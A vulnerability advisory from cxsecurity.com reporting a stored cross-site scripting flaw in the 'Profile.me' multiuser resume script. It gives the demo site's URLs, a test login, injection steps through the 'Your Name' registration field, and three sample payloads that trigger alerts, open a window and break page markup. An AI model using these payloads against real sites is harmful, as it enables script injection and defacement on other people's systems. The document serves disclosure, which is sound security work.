Profile.me - Multiuser profile & resume script Stored XSS Injection

2019.05.05
ru QUIXSS (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection [*] :: Author: QUIXSS [*] :: Date: 2019-05-05 [*] :: Software: Profile.me - Multiuser profile & resume script [?] :: Technical Details & Description: # Weak security measures like bad input fields data filtering has been discovered in the «Profile.me - Multiuser profile & resume script» web-application. [?] :: Demo Website: # https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952 # Frontend: http://profileme.pokkho.com # Backend: http://profileme.pokkho.com/login # Login/Password (user): quixss/asdasd [!] :: Special Note: # After a few injections you'll see that some blocks on the «Users» page are broken due to bad input fields data filtering. # There are various mechanisms to secure application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention © author [!] :: For developers: # Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients. [+] :: PoC [Links]: # http://profileme.pokkho.com/login (log in as quixss/asdasd) # http://profileme.pokkho.com/admin/users (marquee) [+] :: PoC [Stored XSS Injection]: # Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the «Your Name» field for payload injection. Probably there is another vulnerable fields, but they are all disabled on the demo website. # Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/> # Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif"> # Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS

References:

https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952
https://twitter.com/quixss


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top